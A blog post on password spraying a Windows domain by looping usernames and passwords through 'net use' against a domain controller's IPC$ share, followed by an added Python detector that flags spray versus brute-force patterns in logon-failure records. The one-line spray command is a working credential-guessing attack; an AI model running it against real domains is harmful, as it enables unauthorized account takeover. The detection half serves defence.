A while ago, Dave Hoelzer did a nice video on how to use Windows PowerShell to hack domain user accounts. Basically, Dave leveraged PowerShell commands which any domain user can execute on a domain and receive either a positive or a negative response based on the legitimacy of the username and password combination. This got me thinking. Since I’m not typically handed, or able to spawn, a PowerShell right from the get-go, what else could I use to accomplish the same goal? The answer is attempting to connect to the IPC$ share of a domain controller. Using the following command, you can spray a huge list of domain users with a small number of passwords (to avoid lockout) and try to catch someone using something simple.
@FOR /F %n in (names.txt) DO @FOR /F %p in (passwords.txt) DO @net use \\DC01 /user:mydomain\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DC01\IPC$ > NUL
WARNING: Make sure the number of passwords in your file is less than that of the account lockout policy.
And the other obligatory warning – make sure you have approval from Corporate before trying this.
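The flip side of the lockout warning above is what a defender should take from this post: a spray deliberately stays below the lockout threshold, so alerting on lockouts alone never fires. What does stand out is one source failing against many different accounts in a short window, each only a few times. The following is an added example, not code from the original post or from Dave Hoelzer's video; it runs the detection over constructed records shaped like the fields a SIEM extracts from Windows Security event 4625 (target user, source address, SubStatus, time). The sample data, the field names and the thresholds are assumptions chosen for illustration; the two SubStatus values are the standard NTSTATUS codes for a wrong password and a non-existent user.

```python
"""Classify logon-failure sources as password spray vs. single-account brute force.

Added example (not part of the original post). Input records are constructed
to resemble the fields extracted from Windows Security event 4625:
time (ISO 8601), source (client address), user (TargetUserName), substatus.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# 4625 SubStatus values that mean a credential guess was made, as opposed to a
# policy restriction such as an expired account (standard NTSTATUS codes).
GUESS_SUBSTATUS = {
    "0xC000006A",  # STATUS_WRONG_PASSWORD: account exists, password was wrong
    "0xC0000064",  # STATUS_NO_SUCH_USER: account does not exist
}


def _gen(source, users, base, step_seconds, repeat=1):
    """Build constructed 4625-style failure records from one source."""
    out = []
    t = datetime.fromisoformat(base)
    for u in users:
        for _ in range(repeat):
            out.append({"time": t.isoformat(), "source": source,
                        "user": u, "substatus": "0xC000006A"})
            t += timedelta(seconds=step_seconds)
    return out


# Constructed sample log (assumed values, not real telemetry):
#  10.0.0.55 tries one guess against six accounts within 30 seconds (a spray),
#  10.0.0.77 hammers a single account eight times (brute force),
#  10.0.0.90 is a user mistyping their own password twice (benign noise).
SAMPLE_EVENTS = (
    _gen("10.0.0.55", ["alice", "bob", "carol", "dave", "erin", "frank"],
         "2024-01-10T09:00:00", 5)
    + _gen("10.0.0.77", ["bob"], "2024-01-10T09:05:00", 2, repeat=8)
    + _gen("10.0.0.90", ["carol"], "2024-01-10T09:07:00", 30, repeat=2)
)


def classify_sources(events, window_minutes=10, min_distinct_users=5,
                     lockout_threshold=5):
    """Return {source: verdict} with verdict 'spray' or 'bruteforce'.

    spray:      within one sliding window a source fails against at least
                min_distinct_users accounts while keeping each account below
                lockout_threshold, i.e. exactly the pattern that never trips
                a lockout-based alert.
    bruteforce: a source reaches lockout_threshold failures on one account.
    Set lockout_threshold to the domain's real account lockout threshold.
    """
    window = timedelta(minutes=window_minutes)
    by_source = defaultdict(list)
    for e in events:
        if e["substatus"] in GUESS_SUBSTATUS:
            by_source[e["source"]].append(
                (datetime.fromisoformat(e["time"]), e["user"]))

    verdicts = {}
    for source, attempts in by_source.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Slide the window start forward until it spans <= window_minutes.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            per_user = Counter(u for _, u in attempts[start:end + 1])
            busiest = max(per_user.values())
            if busiest >= lockout_threshold:
                verdicts[source] = "bruteforce"
            elif len(per_user) >= min_distinct_users and source not in verdicts:
                verdicts[source] = "spray"
    return verdicts


if __name__ == "__main__":
    for src, verdict in classify_sources(SAMPLE_EVENTS).items():
        print(f"{src}: {verdict}")
```

Tune min_distinct_users to the environment's normal noise (a shared jump host or a misconfigured service account will fail against a handful of accounts legitimately) and set lockout_threshold to the real policy value so the two verdicts line up with what the spray in this post is designed to stay under. Pulling the same fields from event 4776 (NTLM validation on the DC) catches sprays that land on the IPC$ share even when the failing logon is never written as 4625 on a member server.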
via PaulDotCom: Archives.